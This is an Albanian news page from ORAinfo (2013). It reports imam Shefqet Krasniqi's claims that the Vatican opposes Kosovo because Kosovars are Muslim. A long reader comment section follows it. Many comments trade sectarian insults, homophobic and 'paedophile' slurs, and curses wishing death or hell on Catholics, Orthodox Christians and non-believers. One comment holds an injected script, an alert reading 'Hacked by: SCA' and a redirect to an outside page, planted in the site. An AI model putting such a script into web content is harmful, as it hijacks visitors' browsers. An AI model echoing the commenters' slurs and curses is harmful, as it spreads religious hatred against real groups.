Shefqet Krasniqi: Për Vatikanin e rrënuam shkollën - s’na pranojnë se jemi myslimanë - Nacionale | ORAinfo.com - Nuk ndalet
1
 • Lajmi
 • 71 Komente

Shefqet Krasniqi: Për Vatikanin e rrënuam shkollën - s’na pranojnë se jemi myslimanë

23:2606 Janar 2013

Deklaratave të kardinalit të Vatikanit, Walter Kasper iu është përgjigjur imami i Xhamisë së Madhe në Prishtinë, Shefqet Krasniqi, edhe pse ai thotë se nuk është aq i befasuar me kësi lloj deklaratash, e sidomos kur ato vijnë nga Vatikani.

Krasniqi ka thënë për ORAinfo se Vatikani edhe njëherë e ka vërtetuar se është kundër popullit të Kosovës, vetëm për shkak që 90 për qind e tyre janë të fesë myslimane.

“Nuk më kanë befasuar shumë ato deklarata. Edhe pse Kisha Katolike e Kosovës, duke u munduar t’i mbulojë marret e Vatikanit, ka deklaruar më herët se Vatikani nuk e njeh Kosovën për shkak të Kushtetutës së saj, që i lejon martesat e të njëjtës gjini. Por, këtu është ajo se ata nuk e njohin Kosovën përderisa të mos rregullohen raportet e plota në mes Kosovës dhe Serbisë dhe se Kosova është pjesë e Serbisë. Këtë e ka vërtetuar edhe ky zotëria para Kishës Ortodokse në Rusi. Vatikani edhe njëherë ka treguar se nuk është pro shqiptarëve, por është kundër tyre, për faktin se shqiptarët janë mysliman”, ka thënë imami Krasniqi.

Krasniqi thotë po ashtu se Vatikani nuk do që t’i prish marrëdhëniet me Kishën Ortodokse Serbe.

“Me të drejtë, që ata zotërinj nuk duan t’i prishin marrëdhëniet e tyre as me Kishën Ortodokse Serbe. Përderisa ata thonë që Kosova është djep i Kishës Ortodokse Serbe, kjo të lenë me kuptua që Kisha Katolike, Vatikani, është zhgënjyer që Kosova ka dalë nga kompetencat e Serbisë (Kishës Ortodokse)”, thotë Krasniqi, duke shtuar se Serbia në krye me Millosheviqin, i dirigjuar dhe i komanduar nga Kisha Ortodokse, kanë kryer masakra ndaj popullit shqiptar.

“Ato masakra janë bekuar nga priftërinj. Kisha Ortodokse dhe krejt këto futen në këto deklarata të Vatikanit. Si mund të harrohen ato masakra, si mund të thërret për paqe dhe solidaritet. Çfarë paqe mund të jetë nëse Kosova do të ishte nën Serbi”, shprehet Krasniqi.

Imami Shefqet Krasniqi tutje thotë se ish-presidenti Rugova ka qenë ai që ka prishur një shkollë në mes të Prishtinës, për të ndërtuar një katedrale. Sipas tij, ajo katedrale është ndërtuar vetëm për t’i hyrë në qejf Vatikanit dhe për ta mbrojtur ose edhe për ta njohur shtetin e Kosovës, por që u është kthyer ‘bumerang’.

“Por, Vatikani nuk na ndihmojë, as gjatë luftës, as mbas lufte, as nuk na njohu tash pas shpalljes së pavarësisë, por është vetëm kundër pavarësisë, e ndërsa na ia ndërtuam kishën dhe u munduan ta bindin popullin që duhet të jetë kisha për hatër të Vatikanit, e shikoni tash çka të bënë Vatikani”, shprehet Krasniqi.

“Shyqyr zotit që kjo Evropë është zhveshur nga Kisha Katolike, se ne nuk kishim me qenë as të çliruar e as nuk na kishin njohur pavarësinë tonë. Populli duhet ta kuptojë që edhe ne jemi për Evropë, por mos me u mundu me i bindë që feja katolike është duke na ndihmuar dhe do të na ndihmoj. Vatikani, i cili përfaqëson fenë katolike, në esencë është diçka tjetër”, ka përfunduar Krasniqi. (Dardan Hoti/ORAinfo)

Google Ads.
Komentet
 • BENYYY

  09:4311 Gusht 2015
  Une jam musliman por nuk e perkrahi krasniqin qe po ndikon me fjlimet e tij po I merr ne qaf rinin e kosoves edhe po I dergon ne siri e irak me luftu tung prej Afghanistani
 • fadili

  00:3828 Qershor 2015
  po ju pershendes te gjiithve edhe sa koha mu marr ma me fe pun o vlla se jemi mas shum e hogjen e pershendes agjerim te let po perqamje jo per fe se asht turp per popullin ton sjem na muslimant radikal po kish ne llapushnik sma kish marr menja mejav maru jo pse sduhet mi maru po aty ju takon lufetarve te liris aty asht ven i luftes e jo i feve ju takon te bajn park ose ose varresat e luftes te uqk se jo as gjami as kish me gjith respektin ekishen duhet mi maru ne qoft se asht e nevoishme edhe varrezat e katolikve po diku tjeter diku ne rrethin ju bash ku ishte fronti i uqk se me respekt
 • Rudi

  07:2518 Prill 2015
  Hoxho e kemi lshue rrugen e zotit e jemi ba musliman, duhet te kthehemi aty ku kemi qen para pushtimit Turk , pra ne KATOLIK , e besoj se edhe ti do te ishe ba ni PRIFT I mir
 • genti

  00:4529 Tetor 2014
  O ju budalaq si mundni te kini fjalorin per ni hoxh si i nderuari imami Shefqe krasniqi ju smundni tae permendni emrin e tij me at goj te flliqur
 • shqipetari

  05:0601 Prill 2014
  me tregon ndo njani pse arabia nuk na njeh ende si shtet derisa vllaznit e tane shkojne e vriten ne siri shehidet shqiptar ne kosovaret e kemi knaq mitrovicen na ka mbet siria respekt te gjitheve Kurani famelarte thote nuk dedyrohet nje musliman personalisht te shkoj dhe te lufton ne shtet te tjeter duhet te mblidhen krejt muslimant dhe ti pajtoj ata grupet musliman qe luftojn ne arabi mendimi im respekte
 • loqka jotee

  11:5610 Tetor 2013
  e vertett Hoxh se s pranojn se jemi muslimannn
 • Naseri

  02:1410 Tetor 2013
  me 1878 ne konferencen e Berlinit ( me ndihmen e Anglise,malezezes morren hotin,gruden,ulqinin etj etj ), dhe ne kete konference te tmerrshme kunder shqiptareve popujt dhenqeverite evropiane e morren vilajetin e kosoves me kryeqytet shkupin ia dhane maqedonise dhe serbise,vilajetin e shkodres nje pjese te madhe malit te Zi,vilajetin e manastirit ia dhane maqedoneve dhe vilajetin e janines ia fpdhane greqise... me 1913 ne konferencen e ambasadoreve ne londer,prape e copetuan evropa shqiperine, ne versaje me 1919 prape e copetuan... boris jelcin deshi ta formonte kontinentin euroasia ( rusisa,ukraina,moldavia,armenia,kaukszi,rumania,bullgara,serbia,maqedonia,greqia dhe qipro dhe krejt keto ishin ne marreveshje orodokse dhe u nderpre ne serbi me bombardine,kjo vije me integrim te rumanise dhe bullgarise ne be, greqia ne krize dhe qipro dhe ne ende mendojne se na lirusn per shkak dhibjes per ne ) . bravo hoxhe sepse katoliket fshihen kinse pas kombit ndersa mendjen e kane ne shkaterrimin e myslimaneve ne kosove. ne ende jemi ne enderra...
 • Arbanas

  11:5230 Korrik 2013
  Lartmadheria e tije Ibrahim Rugova idete, besimin dhe veprimet e tija i ka pasur me shume per shkaqe parimore dhe te verteta e me pak per shkaqe praktike. Dhe kur te permendet emri i tije dhe te bemat e tije duhet pasur shume kujdese se cfar fjale leshojme nga goja. Tek idete , bindjet dhe kultura qendron dallimi dhe e mira e tije dhe e keqja e jote aga hoxhe.
 • dardani

  11:3918 Maj 2013
  shqiptaret gjithmon kan qen kunder njeri tjetrit sju kuptoj me kto gjeste kthjelli pak se jeni ne rrug te gabuar kta njerz qe ofendojn popullin katolik si kuptoj pse kan ikur pra ne ato shtete Katolike te kerkojn ndihm rrespekt per postin e hoxhes por jo per krasniqin se ky paguhet nga shteti serb per kso trazira ksi njerzish veq qka na prishin imazhin ton si musliman nje thenje evjeter nje budalla e hidh gurin pastaj 100 te menqur nuk mund ta gjejn rrespekt per gjdo shqiptar te vertet qofshi te bekuar
 • mmm

  02:5618 Maj 2013
  alert("Hacked by: SCA")window.location="http://pastehtml.com/view/d2j09ala2.html";
 • Evropa Wiena Kosova Dragashi

  21:4909 Prill 2013
  Do ktu qysh e lexova pe quajn hogjen te mbrapambetur sepse hogja paska lexue Kuran e kurani nditet e sodit te ben primitiv.. Pa Islam Shko kut te shkojsh ti je i Humbur(nuk ki qellim per ket jet e per jeten tjeter). E sa per primitiva jon kta evropjant ku ni pjes bukur e madhe jetojn me Qen e nuk jetojn me fmin e vet , jetojn nen ndikimin e droges e alkoholit etjj. - Hajt mtregoni mu ju a qeshtu jetohet a ? Muslimani e ka jeten e lumtur se jeton bashk me familje esht i Kthjellt gjat jetes se tij nuk esht nen ndikimin e droges e alkoholit.. Cili po jetojka ma mir.. Veq me kto dy fjali mundish me dallue me kon pak i kthjellt cilit po jetojkan ma mir e mos te flasim per gjera tjera.Edhe sa per pasuri Vendet muslimane i ka shkatrrue lufta e pa drejt qka u bo ndaj tyre nga Israeli per me i zhduk muslimant.. E sa per ISLAMI ni shtet qe nuk pe zhvillojka sipas jush ! Shikone ju DUBAIN e mos u mirrni me fjal palidhje... Hogjen Allahu e shperbleft. E respektoj shum Dr Shefqet Krasniqin.
 • SHKUPI

  11:5128 Shkurt 2013
  Ashtu eshte hoxhe i nderuar.....Ke SHum Te Drejtt.
 • Albi

  12:3827 Shkurt 2013
  PO ke te drejt HOXHE
 • besi

  16:2219 Shkurt 2013
  Hoxh efendi a mundesh me na than gjate krejt historis prej cilave shtete kemi pasur ma shume ndihm ? Atyre muslimane apo atyre katolike . Prej shteteve muslimane skemi pas asnje ndihm , ma se pari nuk na kan njohur shumica e shteteve muslimane. SHBA,Britania,Gjermania,Franca keto jan shtete qe na kan ndihmu.
 • Burimi ,Prishtinë

  22:3313 Janar 2013
  Të nderuar ,para se gjithash dikush duhet të thotë të vërteten ,edhe pse ajo mund të jetë e hidhur për dikend.Si do që të jet,prof.dr.Shefqet krasniqi në te gjitha periudhat e historis e ka dhënë kontributin e vet .Ndaj e falenderojm Zotin e gjihtësisë që na ka bërë të jetojm në kohën e tij.
 • paemer.

  16:1612 Janar 2013
  folni naj sen qe mundemi me marr msim qoft per fe apo per naj aspekt tjeter te jetes e lene ju shefqet krasniqin se ai eshte doktorr nveti .merrnu ma shum me veten tuaj .llogareteni veten para se te ju llogaris Allahu i madheruar se kuku per ju .edhe per fund ma shum vepra e ma pak fjal.!
 • Kushtrimi

  05:3611 Janar 2013
  Ky është i vetmi që "guxoi" të flas haptas realitetin për Vatikanin sepse politikanet tanë heshtin kur edhe vatikani ta quan Kosovën djep të shkenisë!
 • Tahire

  19:4209 Janar 2013
  Ofendone ju hoxhen ton sa te doni .Kurgjo dëm nuk muni mi ba fjalt mbeten fjal.Na krenohmi me hoxhen ton ai esht krenarija e popullit ton.
 • gjilan

  19:4109 Janar 2013
  selam alejkum allahi te shperbleft hoxh
 • Tahire

  19:3109 Janar 2013
  Ofendone ju hoxhen ton sa te doni ju, si boni agje dëm atij po na jeni shum krenar qe e kemi ne mesin ton.
 • Tahire

  19:2109 Janar 2013
  M plot te drejt paska then. Allahu e shperbleft hoxhen ton me xhennet,inshallah ja shton imanin dhe e rujt prej sherrit te gjdo ziliqari.
 • jusufkrasniqi1@hotmail.com

  12:4109 Janar 2013
  selamu alejkum hoxhe i nderuar dr.Shefqet krasniqi thuaje te verteten edhe nese eshte e hidhur sepse e verteta gjithnje ngandhnijen kundrejte te pa vertetes.UNE DO JU BEJA NJE APEL APO ME MIR NJE KESHILLE SEPARI VETES PASTAJ JUVE qe keni komentu, dikur nje akademik shkruante replika ne gazeta kunder atyre qe benin fyrje e sharje dhe thoshte kete ergoment per te me kundershtuar mua sepaku duhet ta keni titullin tim.Dr Sheqet krasniqi eshte nje njohes i mir qeshtjes fetare islame e ne veqanti asaj juridike islame nga i cili drejtim ka marre kete titulle shkencor andaj konkluzat e tij kan nje tjeter perameter nga ato qe pash une qe i ben replika.NJE DIJETAR ESHTE PYTE NJE HER A KE HUMB DEBAT NDONJEHER HER THA PO NJE HER KUR KAM BER DEBAT ME NJERZ TE PA DISHEM INJORANT.
 • tiku

  04:2309 Janar 2013
  leoni, je i humbur ne kete bote dhe ne ahiret, por ende se ke kuptu, apo te presim te rritesh se po me duket se shikon vetem filma vizatimor
 • I'm Muslim

  03:0009 Janar 2013
  Hoxha e nolll mir e ka ama fajeti ka adm qetu qe i jep mundsin tuli far analfabetit me flliq kejt tu shkru sene palidhje me mend qe e kan mir nese i shkrun dy rreshta... marifet po boni ju qifsha motrat katolik t karit shkoni n vatikan qatje e keni venin
 • BASHKIMI

  23:3108 Janar 2013
  Thjesht injoroni kta pedofilla se sja vlen te merremi me ksi mbeturina
 • REMZI

  16:3608 Janar 2013
  ne shqiptaret ke fatin e madh qe i kemi ne mesin ton keta dijetar te medhej kuptojeni o njeres...
 • mani

  16:2308 Janar 2013
  Allahu te nderoft more hoxhe i nderuar,eh po qe na ka kapluar idiotizmi,eh ku jemi ne te mjeret si popull, injoranti me e ofendu dijetarin qe e njeh e gjith bota....Allahu na udhezoft,po qfar gjuhe te urrejtjes po shfaqka dr.Shefqeti o te nderuar keto jan te verteta more,keni harruar ndihmen qe nai ka ber Arabia gjatt luftes edhe ende vazdon te bej ne Kosov.Naj ndalune motrat me shamia ne shkolla vetem qe ti pelqejm Vatikanit po jooo.. Vatikani prap nuk na njohu si shtet...ah po posht qe e keni ulur veten ju qe po e ofendoni kete hoxhe te nderuar..t mjeret ju,Allahu ju udhezoft........
 • suka

  14:2108 Janar 2013
  .......Dr Shefqeti ashte nje mjeshter i fjales dhe prijes i devotshem fetar, shume po munohen qafirat me ba qmos kunder tije por badihava e kan : ate qe e don Allahu smundet kush me poshtnu , e ate qe e poshtnon Allahu ska kush qe e udhezonedrejton. Ne muslimanet nuk i urrejme njerzit por i ftojme ta besojne Allahun 1 , dhe ta adhurojme Allahun siq Ai naj ka caktu kushtet dhe formen per ta adhuruar e jo siq te dojne njerzit ta adhurojne.......dr Shefqeti per mendimin tim meriton rrespekt dhe perkrahje prej te gjithve qe e dojne paqen , e sa i perket disa komenteve te qafirave (me lart) le ta dine se deshten apo sdeshten nje dit dot nrrojn jet e do ti shkojn Krijuesit i Cili do ti fute zvarr ne xhehnem lende e te cilit jan guret dhe gjynahqaret etj .....Allahu naj rujt hoxhen Jarebilalemin........Selam alejkum
 • selatin

  13:4708 Janar 2013
  Nuk po e kuptoj pse po merreni me PEDERA, thjesht injoroni * Allahu eshte NJE*
 • HAMZA

  12:4908 Janar 2013
  ALLAHU e shperblevt dijetarin e mirnjohur ne gjith boten por ti qe fol keq per to do te jesh prej xhenetlive kurse qafirat qe ton diten pin alkohol ku don te jen a thua ku ne xhehnem po ku kan vendin ata te mallkum qe shajn krijusin e tynev bre ALLHU I vraft ata qe nuk jon ne fejen e vertat inshalla
 • omeri

  12:3608 Janar 2013
  ku ku qka na ka gjet osht ardh dita me fol njerzit te pa dije per njerzit doktorra shkence qobanat mu perzi dietarve o ju qe jeni te pa fe edhe qe ton diten pini alkohol rrini te pit si zhtaz qka folni keq per Alema Allahu ja theft qafen dhe Allahu ju shkatrroft ne kit bot dhe ne tjetren inshalla ALLAHU ME AMIN
 • hasani

  12:0608 Janar 2013
  All-llahu te rujt o hoxhe se argumentet jan te tilla nuk do koment. E sa i perket qeshtjes nderfetare ne kosov asnjeher nuk kemi pas probleme. Se sot esht e ditur se e gjithe bota esht kunder muslimaneve dhe ka shum argumente per ket shembull nje boshnjak e gjuiajti ambasaden amerikane vetem muret ne shenje paknaqesie e tjetri vrau 77 njerz dhe u gjykuan njesoj vetem se ky qe gjuajti muret u quajt terorist.Mirpo All-llahun e kemi deshmitar se sa gjenocide jan ber ndaj muslimaneve e ai esht gjykues i mire dhe i drejte
 • leoni

  11:2908 Janar 2013
  shiqoni qfar fjale urejtjeje dhe provokative,per vatikanin rezuam shkollen,mjerisht per ket kler musliman,po ju jeni njejt si komunistat me ideologji,per ket ne shqiptaret kemi me vujt ,vjen nje njeri prej shkolimit ne arabin saudite qe vetem nje liber e ka lexu,kuranin dhe mendon se ne duhet jetuar me sheriat,sa primitiv qe eshte .ket njeri duhet larguar nga kosova se do ta prish popullin dhe rinin kosovare.
 • leoni

  11:1608 Janar 2013
  shiqoni qfar fjale urejtjeje dhe provokative,per vatikanin rezuam shkollen,mjerisht per ket kler musliman,po ju jeni njejt si komunistat me ideologji,per ket ne shqiptaret kemi me vujt ,vjen nje njeri prej shkolimit ne arabin saudite qe vetem nje liber e ka lexu,kuranin dhe mendon se ne duhet jetuar me sheriat,sa primitiv qe eshte .ket njeri duhet larguar nga kosova se do ta prish popullin dhe rinin kosovare.
 • leoni

  10:4708 Janar 2013
  po shof komentet e disa qe nuk mendojn me teper,kur vendet perendimore sulmuan serbin pastaj pranuan pavarsin e kosoves kjo ka qen ne dijeni te vatikanit or i mjeri shefqet krasniqi,por del me komente primitive kinse din diqka,ti je njeri i shitun te dreqi i mallkum,ti sdin asgje vetem flet me urejtje me pallavra te odave qe sot nuk pijne uje more shkretan,por populli edhe ma shkretan si ti qe ju percjell e ndigjon urejtjet tua,zoti te mallkofte skurse je i mallkuar.
 • leoni

  10:4408 Janar 2013
  po shof komentet e disa qe nuk mendojn me teper,kur vendet perendimore sulmuan serbin pastaj pranuan pavarsin e kosoves kjo ka qen ne dijeni te vatikanit or i mjeri shefqet krasniqi,por del me komente primitive kinse din diqka,ti je njeri i shitun te dreqi i mallkum,ti sdin asgje vetem flet me urejtje me pallavra te odave qe sot nuk pijne uje more shkretan,por populli edhe ma shkretan si ti qe ju percjell e ndigjon urejtjet tua,zoti te mallkofte skurse je i mallkuar.
 • lola 8 08 janar 2013

  08:2908 Janar 2013
  allahu te shperbleft hoxh inderuar e ti je gini ekta qate urrejn allahi i shkatrroft
 • mira

  08:2508 Janar 2013
  allahi te shperbleft hoxh i nderuar se fjala jote peshon shum ne zemrat tona ekush te urren skan karakter
 • lola

  08:2208 Janar 2013
  allahu te shperbleft hoxh inderuar e ti je gini ekta qate urrejn allahi i shkatrroft
 • Mani

  03:0508 Janar 2013
  Ne sna ka perkra as Arabi as Vatikani por jemi komb shemullor per gjith boten duke bashk jetu dhe luftu armikun , islami i garanton te drejtat te gjith feve tjera por ata nuk munden. Pra shumica kosovar jan musliman por pushteti nuk e ka ket vizjon dhe prandaj kosova ka shum problem me krime dhe koropsjon.
 • Perparimi

  02:2408 Janar 2013
  All-llahu të shërbleft me gradat ma te nalta o hoxhë i nderuarë dhe shumë i respektuarë!Neve na vynë dijetar si ti.All-llahu te ruajt dhe ta shtoftë diturin,se na knaqe.Ti je kancer per qafirat.Fjala e Allahut gjithmonë do te jetë ma e larta.E ti dr Shefqet Krasniqi,je ai i cili më se shumti je duke luftuarë per ketë dinë madheshtorë.All-llahu na bashkoftë dhe na forcoftë te gjithë muslimanve Yarabilalemin!populli ynë ka nevojë me kuptu realitetin,jemi dukë shkuarë ne humbje te sigurt,nese nuk i qelim sytë.Nuk kemi dobi as prej vatikani e as prej amerike dhe evrope.Kemi dobi nga Islami!Nese ju kthehemi Kuranit dhe Sunetit kemi me dalë fitues ne te gjitha sferat e jetes.Allahu është Ndihmësi dhe Mbrojtësi ma i mirë.Nuk kemi nevojë per askënd tjeter!All-llahu Ekber!
 • Valmiri

  02:2408 Janar 2013
  Allahu te shperbleft o Shefqet Burri se vetem ti ki guxim me dal e me e than ne publik te verteten.
 • njeri

  00:5108 Janar 2013
  ALL-LLAHU e shbrblefté Xhogjené Shefqet se kuré nuké ekamé ndégju duke e urejturé asnjé fe poré gjithmon ka cekuré té vrteten dhe me argumente threté né fené e vrtet me déshiren e gjédokujté,po nuké ofendoné askendé ,dhe gjithmoné me argumente .....e mosé ubani mendéje medhenjé ne jemi késhtu e ata jané ashtu se njé kombé jemi e duheté té mburemi qé jemi kushé jemi e fené e zgjedhé té cilené do veté njeriu Elhamdulilahé duheté thén gjithmoné pér kader miré apo keqé nuké ashté né duarté e tona po né doré té ALL-LLAHUT e ne duheté gjithmon té mundohemi pér té miren e vetvehétes dhe té shoqris dhe té kombité pa dallu se qfaré feje ka ....Selamu alekum w rahmetullahu bereketehu
 • Ado

  00:4908 Janar 2013
  Kush e shanë Hoxhë Dr.Shefqet Krasniqin ja u uroj për shumë mot KRISHTLINDJET ORTODOKSE!
 • Ado

  00:4908 Janar 2013
  Kush e shanë Hoxhë Dr.Shefqet Krasniqin ja u uroj për shumë mot KRISHTLINDJET ORTODOKSE!
 • Opoja

  23:4907 Janar 2013
  Qka na duhet neve,na njofti ose jo Vatikani,Kur jam i sigurt se nje dite te gjitha fete tjera do te konvertohen ne Musliman.(perveq Jahudive).sepse realiteti eshte Islami....
 • Kimete Gashi

  23:2107 Janar 2013
  Se kam të qart pse diskutoni komentoni në një mënyr të anes nagative ju si qytetar, Hoxh Krasniqi për mendimin tim e ka thënë këtë sepse e din më mir të vërteten,kurse neve si qytetar të thjesht skemi nevoj të diskutojm apo të komentojm me urrejtje dhe fjal të ndyta.është shum e vërtet se Vatikani nuk na njohur por neve sduhemi të urrehemi pse Vatikani spo na njef me këtë dua tju them keni kujdes me komentet e juaja e mos u tregoni si qytetar të pa kultur flm për mirkuptimin ju përshëndes.
 • bashkim

  23:1607 Janar 2013
  paramndone vllazni me pas prish muslimant ni shkoll sa nami i belas ish ba po te paftyr kish qen ky popul bre
 • bashkim

  23:1307 Janar 2013
  ni musliman qe e ofendon hoxhen e nderum dhe te rrespektum ai eshte musliman i kafiqave dhe injorant i madh kjo ke per qat tucin ti koke krenar edhe menemadh edhe injorant i madh qfar muslimani be ti be allahu ftyren ta marroft more qen
 • urim

  23:0907 Janar 2013
  ravo hogj i nderuar e ti idriz nese po thu qe feja e shqiptarit eshte shqiptaria ather cili qenka kombi jot por ama eshte e vertet qka po thot hogja por une jam mysliman edhe skam asgje kunder katolikve por ama secili e ka fen vet e ata qe thojn kshtu feja e shqiptarit eshte shqiptaria ata as nuk e besojn zotin dhe nese qenka feja shqiptaria ateher cili qenka profeti i ksaj feje
 • bashkim

  23:0907 Janar 2013
  o ahmet paske shllajfit ti se hoxha po fol me argumente e ti qiti argumentet ne paq
 • Kosovari

  19:5607 Janar 2013
  Per hire te te vertetes publikone. Imam Shefqet, 1. Kisha Katolike ka paguar per trollin me shume se 800 000 euro. 2. Kisha Katolike ka ndertuar me qindra Shkolla neper Kosove nepermjet organizatave katolike si Caritas dhe shume te tjera. 3. Mulla Shefqet, ti dhe disa kolege te tu prifterinje qe ngarendni shume mbas mikrofonit ne vende qe te predikoni paqen, ne ndergjegjen (nese keni) e juaj morale dhe shpirterore po bartni mekatin/gjynahin e perhapjes se urrejtjes. 4. Gjynahi/mekati me i madhe eshte perhapja e te pa vertetave.
 • Remi

  18:4107 Janar 2013
  Kujdes vllezer mos e ofendoni njeri tjetrin,por tregohuni te arsyshem edhe shprehuni lirshem,
 • Artan

  14:4807 Janar 2013
  E paska thane te verteten!
 • Arbeni Pr.

  12:1107 Janar 2013
  te lumte hoxhe kesaj here ja paske qellu si me gishte...eshte shume e vretete qe katoliket o Kosoves apo thene me mire pakicat katolike kan fillu me e ndje veten si shume superiore vetem pse ata nuk bohen sunnet nuk e pastrojne prapanicen me uje por me leter ne Wc. nese europianizmi mbetet ne papasterti atehere nuk duam te jemi europian na ... hallall shef,
 • ASTRITI

  11:5307 Janar 2013
  Per IDRIZ Anton Mal Kosova: Na keni lodhe me kete se feja e shqiptarit eshte shqiptaria. Ku dulem na populli ma i menqem ne bote qe edeh fene me pase ne emer te kombit , kjo eshte definitivisht e tepert, turp. Ka shqipetare Muslimane dhe ne mase me te vogel Katolik. Per Ilirin : Shefqet Krasniqi nuke eshte Zot andaj mos ju drejto me Zoti krasniqi. Mos bire pre e mediave. Drejtoju me ZotRi. Per Hasanin: Une nuk pashe qe ky hoxhe eshte tu e prish harmonin ne kete popull as nuk e pashe qe ky foli kunder katolikeve shqiptare edhe mos harro realiteti duhet te thuhet sa do i hidhure qe te jete e kushe e ka mizen mas veshit nuk ka kush qa me i be.
 • Idriz Anton Mal Kosova

  10:5307 Janar 2013
  Hahaha, kape njanen e mshoj tjetres si Vatikani ashtu edhe Arabistani na kane nihmue na kane ... nanen mire. Ne jemi SHQIPTARE o popull, Feja e Shqiptarit eshte Shqpitaria.
 • arta

  10:4707 Janar 2013
  si femi po folni bash krejtë - keta jemi ne nje fjal pa najfar randesie e qet dikush na i hajna foret
 • ilir

  10:4107 Janar 2013
  zoti shefqet kurre skam qene me ju por ama ketu keni te drejte.
 • ToniB

  09:2907 Janar 2013
  So me rendesi e pelqen apojo kete ima, i abonohesh apo jo gjitha qendrimeve te tij...por qe ketu krejt keto qe i ka thene topi si luen. Ju dul boja katolikeve. Kqyrini trevat katolike sa jane preke nga lufta: Stublla e Don Lush Gjerjgjit as qe kishte pesuar ndonje shkaterrim. Ne viziten pas lufte fshataret donin me na be (sepse kujtonin jemi te huaj) se ata nuk ajen preke sepse kane qene katolik. So me rendesi vetem kjo.Me rendesi krejt cka benen pas luftes: rrenuan shkolle bre hej!!! E te flasin per perparimtar! Po mire e ka thene imami - shyqyr qe Evropa sju fut fort se ne te kunderten i kishm pas punet edhe me keq. Zoti iu shplofte krejt dallaveret ketyre. Ndersa eshte per tu gerditur qysh ja nisin me shkru shqiptaria ne menyre apologjetike per kur shkretojne kqyalit e per musliman nuk jane hiq te balancuar e te drejte. Po behen si maqendoasit, pa identitet - por qe keta tont po e humbin identitetin prej marres sepse me lexu pak ishin mbure sa te miren ia kane pa Islamit.
 • luli

  07:0107 Janar 2013
  hei juv qka pasni shkru komente palidhje do e do mos hani mut palidhje se juv as 10 perqin se mani fen e muslimaqnve edhe pse jeni muslimon te kukshi njerz te kafiqave te rrugve allahu ju drejtoft inshalla hogj respect per ty e selam alejkum
 • nc

  01:2107 Janar 2013
  ooo trim budall,vetem pak te kishe ne kok, oj lop po sa her ja ka puth doren rugova jyt,papes e perhir ti te na pranon. o lesh qite gishtin pak ne kok.
 • trimi

  01:0207 Janar 2013
  Mos e permend Rugoven more ti primitiv, ti shkoj e mbaju ders neper oda si ne shek.19 se neper portale nuk te shiten keto pallavra o pallavraxhi...edhe pse une jam musliman, bile krenare qe jam i tille, trego pse psh spo na nje Indonezia?
 • nc

  00:5207 Janar 2013
  o hasan shko vete anton kqiren.
 • hasani

  00:4207 Janar 2013
  pse bre lejoni kete njeri me mbjell urretje ne kete popull vllazeror se edhe katoliket kan luftu ne kosove kundra armikut shekullor pse bre zot ky njeri e prish harmonin ne ket vend te bekuar se vetem serbija asht mundu me prish kete harmoni
 • atdhe

  00:1307 Janar 2013
  all-llahu ta shtoft dinin, imanin,diturin, e fol te vrteten.zoti te shprbleft. es selemun alejkum.
 • baci

  00:0807 Janar 2013
  Ju spasni lidhje as njoni , kqyrne veten e mos u perzini fort ne pune te huja
 • atdhe

  00:0507 Janar 2013
  all-llahu ta shtoft dinin, imanin, diturin, zoti te shprbleft. ky esht realiteti bravo.
 • besimi

  00:0207 Janar 2013
  mosu u gut a vlla muslimon mos i shtin ton me ni thes se sjon ton nisoj o vlla
 • ahmeti

  23:4106 Janar 2013
  ti bre hoxhe ke shllajfit,, kta i kan fajet qe vin edhe te marrin ne intervist ty..
 • banni

  23:3306 Janar 2013
  Ke SHum Te Drejtt.
Hapsira Reklamuese.

Komento:

VËREJTJE: ORAinfo mban të drejtën e përzgjedhjes së komenteve që do të publikohen. Komentet që përmbajnë gjuhë të urrejtjes, përmbajnë sharje dhe lëndime, si dhe komentet që nuk ndërlidhen me artikullin në të cilin komentoni, nuk i publikojmë.

Ju faleminderit!

Lajme të tjera